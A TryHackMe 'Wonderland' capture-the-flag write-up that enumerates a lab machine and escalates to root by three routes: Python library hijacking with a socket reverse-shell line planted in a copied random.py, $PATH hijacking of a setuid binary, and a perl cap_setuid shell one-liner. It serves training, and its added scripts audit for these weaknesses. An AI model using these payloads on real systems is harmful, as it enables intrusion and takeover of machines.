# TryHackMe : Wonderland WriteUp
This is my writeup for the Wonderland room/machine on the TryHackMe.com platform. Remember this is just how I solved/owned the machine; there may be different and faster paths, but...
## Machine
*Fall down the rabbit hole and enter wonderland.*
The machine is called wonderland, room wonderland, the link is https://tryhackme.com/room/wonderland. This is a medium machine; I spent more time than I thought, but...it's a really good exercise to complete!
With this machine you can refresh a lot of good things about privilege escalation and how to read an ELF file. Remember the IP changes every time...
## Recon
First of all I run a classic nmap scan:
```bash
nmap -sC -sV -p- 10.10.40.248
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-18 04:44 EST
Nmap scan report for 10.10.40.248
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
I'm looking at a Linux machine with the two classic ports open: 22 and 80.
The website is just a single page:

I run cURL just in case I'm missing something:
```bash
curl -L -i http://10.10.40.248
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 402
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 01 Jun 2020 22:45:08 GMT
Date: Tue, 18 Jan 2022 09:48:39 GMT
Follow the white rabbit.
Follow the White Rabbit.
"Curiouser and curiouser!" cried Alice (she was so much surprised, that for the moment she quite forgot how to speak good English)
```
The only new folder is /img; I'll take a look at it in a bit.
I run gobuster to check for hidden or unlinked pages and directories:
```bash
gobuster dir -u http://10.10.40.248 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.248
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2022/01/18 04:50:26 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.40.248/img (Status: 301) [Size: 0] [--> img/]
http://10.10.40.248/index.html (Status: 301) [Size: 0] [--> ./]
http://10.10.40.248/r (Status: 301) [Size: 0] [--> r/]
gobuster dir -u http://10.10.40.248 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.248
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/18 04:51:51 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/r (Status: 301) [Size: 0] [--> r/]
/poem (Status: 301) [Size: 0] [--> poem/]
```
and I notice there is a /r page, so I browse to it

Nice...but still nothing, just an HTML page without any other clue. The /poem page is the same, just a nonsense poem :)
I run another gobuster scan for directories, this time using http://10.10.40.248/r as the starting point...and voila! There is an /a under the /r page

Wait wait...what is following Alice? The white rabbit.
I have a clue: /r/a/; I'm 99% sure the following path will be /r/a/b/b/i/t

and there it is! Still a normal page without any link, so I run cURL and
```bash
curl -L -i http://10.10.40.248/r/a/b/b/i/t
HTTP/1.1 301 Moved Permanently
Location: t/
Date: Tue, 18 Jan 2022 10:07:42 GMT
Content-Length: 0
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 782
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 01 Jun 2020 22:41:05 GMT
Date: Tue, 18 Jan 2022 10:07:42 GMT
Enter wonderland
Open the door and enter wonderland
"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."
Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."
alice:####THEPASSISHERE###
```
...finally I have the username and password to log in as alice!
Another clue (I found it later) was present in the image *white_rabbit_1.jpg*

If I download the image from the home page and analyze it with steghide, I find a clue:
```bash
steghide extract -sf Downloads/white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t
```
yes...I'll follow the /r/a/b/b/i/t :)
## Initial foothold (as alice)
I connect to the machine via SSH using alice and the password found:
```bash
ssh alice@10.10.40.248
...
alice@wonderland:~$
```
First of all I check what is present in my home directory:
```bash
alice@wonderland:~$ ls -ltra
total 44
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
drwx------ 3 alice alice 4096 May 25 2020 .gnupg
drwx------ 2 alice alice 4096 May 25 2020 .cache
-rw------- 1 root root 66 May 25 2020 root.txt
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
drwxr-xr-x 6 root root 4096 May 25 2020 ..
-rw------- 1 alice alice 7 Jan 18 10:14 .python_history
drwxr-xr-x 5 alice alice 4096 Jan 18 10:14 .
```
The file root.txt surely contains the root flag (and I can't read it now), and the Python script seems really interesting.
Now the tricky part: the hint on the room is *Everything is upside down here.*...well...if root.txt is in alice's home dir, then user.txt must be in root's home dir
```bash
alice@wonderland:~$ cat /root/user.txt
THM{......}
```
## PrivEsc 1 (rabbit)
I run some classic commands to understand what I can and can't do:
```bash
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$ cat /etc/sudoers.d/alice
alice ALL = (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/sudo
/bin/fusermount
/bin/umount
/bin/ping
/bin/mount
/bin/su
alice@wonderland:~$ find / -type f -perm -04000 -ls 2>/dev/null
394282 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
394475 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
394471 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
524949 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
394289 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
393716 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
393920 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
394097 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
393714 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
393936 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
393809 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
393919 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
393663 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
393918 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
393956 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
394061 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
655427 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
655971 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
655478 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
655970 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
655494 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
alice@wonderland:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
tryhackme:x:1000:1000:tryhackme:/home/tryhackme:/bin/bash
alice:x:1001:1001:Alice Liddell,,,:/home/alice:/bin/bash
hatter:x:1003:1003:Mad Hatter,,,:/home/hatter:/bin/bash
rabbit:x:1002:1002:White Rabbit,,,:/home/rabbit:/bin/bash
```
OK, it seems I can run the Python script as the user rabbit (and gain access as rabbit); let's read it with `cat walrus_and_the_carpenter.py`:
```python
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
...cut...
"""
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
```
The script just imports a library (random), calls one of its functions (choice) and prints random lines from the poem embedded in the script.
After a little research I found a good website with a clear explanation of Python library hijacking:
https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/
According to the article (Method 2):
*This vulnerability is based on the priority order of the Python Library path that is applied to the Module file that our script is importing. When a module is imported in a script, the Python will look for the particular module file inside the default directories in particular priority order. In the python script that we created; we have the webbrowser.py module file that is called. The module that is being searched will be located in one of the default paths. Although if there exists a python module file in the same directory as the original script, it will get priority over the default paths.*
What I have to do is create a Python file named random.py (or just copy the real random library) in alice's home dir, modify it (with a reverse shell, for example) and run the script with sudo as rabbit.
Other players just created a new script with a reverse shell or simply executed bash...my method is a little different and follows the example on that website: copy the random.py library, modify the choice method, open a netcat listener on port 4444 and run the script (yes...more "difficult"):
```bash
alice@wonderland:~$ cp /usr/lib/python3.6/random.py .
alice@wonderland:~$ pwd
/home/alice
alice@wonderland:~$ vi random.py
    ## -------------------- sequence methods -------------------
    def choice(self, seq):
        """Choose a random element from a non-empty sequence."""
        try:
            #### the new line is this one:
            import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.55.171",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
            ####
            i = self._randbelow(len(seq))
        except ValueError:
            raise IndexError('Cannot choose from an empty sequence') from None
        return seq[i]
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```
and in the listener the shell appears:
```bash
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.188.29] 47908
$ id
uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
$
```
Good! I'm rabbit now...the next step is moving to root! Oops, no! There is the hatter user before root.
## PrivEsc 2 (hatter)
As usual, I run some classic commands to understand what I can and can't do:
```bash
rabbit@wonderland:/home/rabbit$ ls -ltra
ls -ltra
total 40
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
drwxr-x--- 2 rabbit rabbit 4096 May 25 2020 .
rabbit@wonderland:/home/rabbit$ file teaParty
file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped
rabbit@wonderland:/home/rabbit$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
1049052 20 -rwsr-sr-x 1 root root 16816 May 25 2020 /home/rabbit/teaParty
394282 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
394475 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
394471 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
524949 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
394289 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
393716 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
393920 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
394097 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
393714 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
393936 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
393809 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
393919 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
393663 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
393918 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
393956 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
394061 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
655427 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
655971 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
655478 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
655970 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
655494 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
```
The most interesting file is the teaParty executable; nothing else is present, so I focus on it.
The teaParty ELF doesn't look like much; if I run it I just get a segmentation fault
```bash
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Tue, 18 Jan 2022 16:28:43 -0500
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
```
I download the file to my Kali box with netcat and check it:
```bash
objdump -s -j .rodata teaParty
teaParty: file format elf64-x86-64
Contents of section .rodata:
2000 01000200 00000000 57656c63 6f6d6520 ........Welcome
2010 746f2074 68652074 65612070 61727479 to the tea party
2020 210a5468 65204d61 64204861 74746572 !.The Mad Hatter
2030 2077696c 6c206265 20686572 6520736f will be here so
2040 6f6e2e00 00000000 2f62696e 2f656368 on....../bin/ech
2050 6f202d6e 20275072 6f626162 6c792062 o -n 'Probably b
2060 79202720 26262064 61746520 2d2d6461 y ' && date --da
2070 74653d27 6e657874 20686f75 7227202d te='next hour' -
2080 52000000 00000000 41736b20 76657279 R.......Ask very
2090 206e6963 656c792c 20616e64 20492077 nicely, and I w
20a0 696c6c20 67697665 20796f75 20736f6d ill give you som
20b0 65207465 61207768 696c6520 796f7520 e tea while you
20c0 77616974 20666f72 2068696d 00000000 wait for him....
20d0 5365676d 656e7461 74696f6e 20666175 Segmentation fau
20e0 6c742028 636f7265 2064756d 70656429 lt (core dumped)
20f0 00
strings teaParty
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
teaParty.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
getchar@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
```
The only interesting part is */bin/echo -n 'Probably by ' && date --date='next hour' -R* and, looking closer, the date command is invoked without its full/absolute path.
This means I can change the $PATH variable, e.g. by adding /tmp at the beginning, and create a fake date command in /tmp that spawns a shell. And, hopefully, I'll be the hatter user:
```bash
rabbit@wonderland:/$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
rabbit@wonderland:/tmp$ echo '#!/bin/bash' > /tmp/date
rabbit@wonderland:/tmp$ echo '/bin/bash' >> /tmp/date
rabbit@wonderland:/tmp$ cat /tmp/date
#!/bin/bash
/bin/bash
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ ./teaParty
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ id
id
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
hatter@wonderland:/home/rabbit$
```
And boom! I'm the user hatter; let's check the home dir:
```bash
hatter@wonderland:/home/rabbit$ cd ../hatter
hatter@wonderland:/home/hatter$ ls
password.txt
hatter@wonderland:/home/hatter$ cat password.txt
THISISTHEHATTERPASS
```
The password of the user hatter is in the file! Good, let's check via SSH:
```bash
ssh hatter@10.10.188.29
hatter@10.10.188.29's password:
....
hatter@wonderland:~$
```
Good! Now it's time to move to root
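The weakness in teaParty is visible without running it: a setuid binary that imports system and embeds a command line whose `date` is resolved through the caller's $PATH. As an added example (not part of the writeup), here is a small triage script that scans `strings` output for such command lines and reports every command word that is not an absolute path; the input is a constructed excerpt of the `strings teaParty` output shown above, and the heuristics are assumptions of this example.

```python
import shlex

# Constructed excerpt of the `strings teaParty` output quoted in the writeup.
STRINGS_OUTPUT = """\
libc.so.6
setuid
puts
getchar
system
setgid
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
"""

# Shell control operators; assumed to be surrounded by whitespace in the command line.
CONTROL_OPS = {"&&", "||", ";", "|"}
# Imported symbols that run a command string or resolve a program via $PATH.
RISKY_CALLS = {"system", "popen", "execvp", "execlp", "execvpe"}


def looks_like_command_line(line: str) -> bool:
    """Heuristic: a string handed to system() starts with a path or chains commands."""
    words = line.split()
    return bool(words) and (words[0].startswith("/") or any(w in CONTROL_OPS for w in words))


def relative_commands(line: str) -> list:
    """Return the command word of each simple command that is not an absolute path."""
    try:
        tokens = shlex.split(line)
    except ValueError:  # unbalanced quotes: not a shell line we can reason about
        return []
    found, expect_command = [], True
    for tok in tokens:
        if tok in CONTROL_OPS:
            expect_command = True
        elif expect_command:
            if not tok.startswith("/"):
                found.append(tok)
            expect_command = False
    return found


def audit_strings(output: str) -> dict:
    """Flag embedded command strings whose commands are looked up through $PATH.

    When the binary is setuid and also calls setuid/setgid, whoever can run it
    decides which 'date' gets executed, which is the weakness used above.
    """
    lines = [ln.strip() for ln in output.splitlines()]
    findings = {}
    for line in lines:
        if looks_like_command_line(line):
            rel = relative_commands(line)
            if rel:
                findings[line] = rel
    return {
        "calls_shell": bool(RISKY_CALLS & set(lines)),
        "changes_ids": bool({"setuid", "setgid"} & set(lines)),
        "findings": findings,
    }


if __name__ == "__main__":
    print(audit_strings(STRINGS_OUTPUT))
```

The fix on the binary side is to call `/bin/date` by absolute path (or reset PATH to a fixed value before system()); an auditor can apply this check to every file reported by the `find / -perm -04000` run earlier.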
## Final PrivEsc to root
As usual, I run some classic commands to understand what I can and can't do.
This time nothing seems usable for moving to root, but I forgot to check the file capabilities (cap_setuid):
```bash
hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
```
I checked it before, but it was not usable by the previous users (perl is executable only by root and the hatter group); this time, if I remember well, it is:
```bash
ls -ltra /usr/bin/perl5.26.1
-rwxr-xr-- 2 root hatter 2097720 Nov 19 2018 /usr/bin/perl5.26.1
ls -ltr /usr/bin/perl
-rwxr-xr-- 2 root hatter 2097720 Nov 19 2018 /usr/bin/perl
```
To better understand what cap_setuid is, check https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities
According to https://gtfobins.github.io/gtfobins/perl/#capabilities, it's pretty simple:
```bash
hatter@wonderland:/$ /usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
# whoami
root
# cd /home/alice
# cat root.txt
thm{thefinalflag}
```
and...machine owned!
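A file capability like cap_setuid on an interpreter is only a problem for the users who can execute that file, which is exactly why it mattered for hatter and not for alice or rabbit. As an added example (not from the writeup), this audit combines `getcap -r /` and `ls -l` output to report dangerous capabilities on binaries that non-root principals can run; both inputs are constructed from the lines quoted above, and the list of dangerous capabilities is an assumption of this example.

```python
import re

# Constructed from the `getcap -r /` and `ls -l` output quoted in the writeup.
GETCAP_OUTPUT = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
"""

LS_OUTPUT = """\
-rwxr-xr-- 2 root hatter 2097720 Nov 19 2018 /usr/bin/perl5.26.1
-rwxr-xr-- 2 root hatter 2097720 Nov 19 2018 /usr/bin/perl
"""

# Capabilities that let a process change identity or bypass file permissions.
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
                  "cap_dac_read_search", "cap_sys_admin"}


def parse_getcap(text: str) -> dict:
    """Map path -> set of capability names; accepts 'path = caps+ep' and 'path caps=ep'."""
    caps = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        path, capstr = line.replace(" = ", " ").rsplit(None, 1)
        caps[path] = {c for c in re.split(r"[+=]", capstr)[0].split(",") if c}
    return caps


def parse_ls(text: str) -> dict:
    """Map path -> (mode string, owner, group) from `ls -l` lines."""
    perms = {}
    for line in text.splitlines():
        fields = line.split(None, 8)  # mode links owner group size month day year name
        if len(fields) == 9:
            perms[fields[8]] = (fields[0], fields[2], fields[3])
    return perms


def non_root_runners(mode: str, owner: str, group: str) -> list:
    """Principals other than root that the mode string lets execute the file."""
    runners = []
    if mode[3] == "x" and owner != "root":
        runners.append(f"user:{owner}")
    if mode[6] in "xs" and group != "root":
        runners.append(f"group:{group}")
    if mode[9] in "xt":
        runners.append("other")
    return runners


def audit_capabilities(getcap_text: str, ls_text: str) -> list:
    """Report dangerous file capabilities on binaries that non-root users can run."""
    perms = parse_ls(ls_text)
    report = []
    for path, caps in parse_getcap(getcap_text).items():
        bad = sorted(caps & DANGEROUS_CAPS)
        if not bad:
            continue
        mode, owner, group = perms.get(path, ("?", "?", "?"))
        runners = non_root_runners(mode, owner, group) if mode != "?" else ["unknown"]
        if runners:
            report.append({"path": path, "caps": bad, "runnable_by": runners})
    return report
```

For this machine the report names both perl paths as cap_setuid binaries runnable by group hatter; removing the capability (`setcap -r /usr/bin/perl`) or restricting who can execute the file closes the path used above.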